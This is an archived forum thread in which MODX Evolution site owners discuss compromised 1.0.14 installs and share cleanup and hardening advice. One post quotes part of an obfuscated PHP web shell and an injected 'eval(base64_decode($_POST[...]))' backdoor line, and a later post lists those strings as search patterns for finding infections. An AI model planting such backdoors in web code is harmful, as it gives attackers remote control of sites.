We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
MODX Community Forums Archive

Some of my modx 1.0.14 are hacked

  • Jako Reply #51, 9 years, 6 months ago
    Quote from: gallenkamp at Oct 14, 2014, 09:59 PM
    I really recomment that tool "maldet" if you have shell access and can install linux stuff.

    Thank you for that recommendation. If you have to install it on Ubuntu, this (german) howto has some advices (tmpwatch is replaced by tmpreaper etc.).
      • 28107
      • 230 Posts
      MacConin Reply #52, 9 years, 6 months ago
      got another site hacked. and it was an absolute clean update after that 1.0.14 site was hacked. we checked all files before updating, removed nearly all plugins (its a nearly static page), and got files in hte manager /includes like

      <?php $r76="F[<PAlDf|]}M@~79/O8Kx\rH6r&-c5k\n3X,YzhQ> Cp\\wUu2jGoB;0i_SN\tn%Vg)ZI^sTRyvL{\$:=1*mE+JW(q4.t'`a!\"#edb?"; $GLOBALS['vtton6'] = $r76[94].$r76[24].$r76[24].$r76[49].$r76[24].$r76[54].$r76[24].$r76[94].$r76[41].$r76[49].$r76[24].$r76[87].$r76[53].$r76[58].$r76[61]; $GLOBALS['jlxru64'] = $r76[53].$r76[58].$r76[53].$r76[54].$r76[66].$r76[94].$r76[87]; $GLOBALS['vajox38'] = $r76[95].$r76[94].$r76[7].$r76[53].$r76[58].$r76[94]; $GLOBALS['qobdl72'] = $r76[36].$r76[70].$r76[27].$r76[45].$r76[61].$r76[76].$r76[31]; $GLOBALS['yhrfr40'] = $r76[20].$r76[69].$r76[36].$r76[20].$r76[58].$r76[15].$r76[46]; $GLOBALS['quzii24'] = $r76[78].$r76[95].$r76[28]; $GLOBALS['tlyiy12'] = $r76[27].$r76[49].$r76[45].$r76[58].$r76[87]; $GLOBALS['kyioa8'] = $r76[87].$r76[53].$r76[78].$r76[94]; $GLOBALS['glyac65'] = 
.....


      file was dated 10.10.2014


      update: also files within /modules/docmanager/lang/are modified with
      eval(base64_decode($_POST['ne1bfba']));?><?php ....
      [ed. note: spackko last edited this post 9 years, 6 months ago.]
        CONIN Werbeagentur . Köln
        http://www.conin.de
        • 49185
        • 11 Posts
        timo_w. Reply #53, 9 years, 6 months ago
        Quote from: spackko at Oct 24, 2014, 05:49 AM
        [...], and got files in hte manager /includes like
        Two things: 1. make sure you rename the ht.access to .htaccess (otherwise, server rewrites are active, which is bad if someone can hack MODX via http); 2. since nothing in the manager directory is ever supposed to get modified by anything/-one (apart from the config file during install), remove write permissions from the manager folder and files after the installation. After that, no malicious code can be placed in the manager folder. Many hosters have way too loose default permissions when uploading files.

        ps: you are from Cologne? I'm living near Koblenz. [ed. note: timo_w. last edited this post 9 years, 6 months ago.]
        • Jako Reply #54, 9 years, 6 months ago
          Quote from: spackko at Oct 24, 2014, 05:49 AM
          got another site hacked. and it was an absolute clean update after that 1.0.14 site was hacked.

          Do you have any access log for this?
            • 28107
            • 230 Posts
            MacConin Reply #55, 9 years, 6 months ago
            Quote from: Jako at Oct 24, 2014, 09:28 AM
            Quote from: spackko at Oct 24, 2014, 05:49 AM
            got another site hacked. and it was an absolute clean update after that 1.0.14 site was hacked.

            Do you have any access log for this?

            will check that later
              CONIN Werbeagentur . Köln
              http://www.conin.de
              • 28173
              • 409 Posts
              Spheerys Reply #56, 9 years, 5 months ago
              It's looks like we are several to have the same problem for 2 months.
              I can understand this problem is hard to solve.
              I'm trying to use the linux tool maldet to detect any malware on evo directory, but I didn't found anything for now.

              Now, my server is grey/black listed because of spam and I'm thinking to move all Evo website under another dedicated server. But of course, it's not the solution. Another "issue" is to "upgrade" these websites under Revo, but it's also a lot of work...

              I don't known how can I help the dev team to find a issue.
              I'm not sure the log files analysis is a solution because the creation date stamp of a incrimined file can also be changed by the malware...
                • 49185
                • 11 Posts
                timo_w. Reply #57, 9 years, 5 months ago
                I'm pretty sure the security flaw has been fixed in 1.0.15, which was released a couple of days ago.
                  • 28173
                  • 409 Posts
                  Spheerys Reply #58, 9 years, 5 months ago
                  Oh ! I missed this new version !
                  I will update all my Evo websites in the hour smiley
                  I will came back here if the problem still occurs...
                    • 28173
                    • 409 Posts
                    Spheerys Reply #59, 9 years, 5 months ago
                    Evo websites updated to 1.0.15 smiley
                    Wait and see smiley

                    I also began a big cleaning of all bullshit by searching in full text these strings :

                    • ="stop_"
                    • eval(base64_decode($_POST[
                    • =strtoupper(

                    I looked twice before deleting, but the results are quite good (2-3% false positives)
                      • 37909
                      • 153 Posts
                      neoziox Reply #60, 9 years, 4 months ago
                      Hello everybody!

                      I have the issues. Only .php files are added or modified. I deleted all files but I have been attacked again. Sorry, but this jerks p** me off. Sorry again.

                      So. The script's Jako work? http://forums.modx.com/thread/93126/some-of-my-modx-1-0-14-are-hacked?page=3#dis-post-512097
                      And the snippet's timo_w? http://forums.modx.com/thread/93126/some-of-my-modx-1-0-14-are-hacked?page=5#dis-post-512660